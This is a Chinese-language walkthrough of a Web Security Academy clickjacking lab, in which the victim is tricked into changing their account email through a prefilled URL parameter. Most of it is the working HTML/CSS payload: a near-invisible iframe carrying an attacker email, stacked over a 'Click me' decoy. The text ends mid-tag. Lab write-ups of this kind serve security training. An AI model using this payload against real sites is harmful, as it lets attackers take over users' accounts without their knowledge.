靶场内容:
该实验室扩展了基本的点击劫持例如在实验室:基本点击劫持与CSRF令牌保护。
该实验室的目标是通过使用 URL 参数预填充表单并诱使用户无意中单击“更新电子邮件”按钮来更改用户的电子邮件地址。
为了解决这个实验,制作一些 HTML 来构建帐户页面,并通过单击“点击我”诱饵来欺骗用户更新他们的电子邮件地址。更改电子邮件地址后,实验室就解决了。
您可以使用以下凭据登录自己的帐户: wiener:peter
靶场分析
- 这个实验也很简单,目的是通过点击劫持诱导目标点击更新邮箱
- 而这个邮箱就是我们黑客的邮箱
<style>
iframe {
position:relative;
width:700;
height: 500;
opacity: 0.0001;
z-index: 2;
}
div {
position:absolute;
top:450;
left:80;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://acf81fac1e709c0d806f1378005800f7.web-security-academy.net/my-account?email=hacker@attacker-website.com"></